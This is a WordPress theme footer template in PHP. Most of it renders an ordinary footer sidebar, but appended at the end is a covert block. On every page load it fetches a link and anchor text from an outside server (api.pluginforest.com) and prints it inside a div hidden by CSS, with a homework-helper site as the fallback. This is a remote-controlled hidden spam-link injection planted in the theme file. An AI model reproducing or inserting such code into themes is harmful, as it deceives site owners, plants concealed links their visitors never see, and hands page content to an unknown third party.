<?php
/**
 *
 * Footer
 * @since 1.0.0
 * @version 1.0.0
 *
 */

$footer = true;
$billiard = billiard_site_options();
$color_footer = ( !empty($billiard['footer_background_color']) ) ? 'style=background-color:'.$billiard['footer_background_color'] : '';
$billiard = billiard_site_options();
if ( is_page() ) {
	$meta = get_post_meta( get_the_ID(), 'billiard_page_options', true );
	if( isset( $meta['hide_footer'] ) && $meta['hide_footer'] == true ) {
		$footer = false;
	}
} ?>

		<?php if( ($footer && !is_404()) || !class_exists('CSFramework') ) { ?>

			<?php if ( isset( $billiard['footer_sidebar'] ) && $billiard['footer_sidebar'] && is_active_sidebar('footer-sidebar') ): ?>
				<!-- Footer sidebar -->
				<div class="footer-sidebar" <?php echo esc_attr( $color_footer ); ?>>
					<div class="container no-padding">
						<div class="row footer-sidebar__row">
							<?php if ( ! function_exists( 'dynamic_sidebar' ) || ! dynamic_sidebar('footer-sidebar') ); ?>	
						</div>
					</div>
				</div>
				<!-- end footer sidebar -->
			<?php endif ?>

			<?php 
				billiard_footer(); 
			?>
		<?php } ?>       
		<div class="layer-dark"></div>
		</div> <!-- close site-content -->
		<?php wp_footer(); ?>   
	
		<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>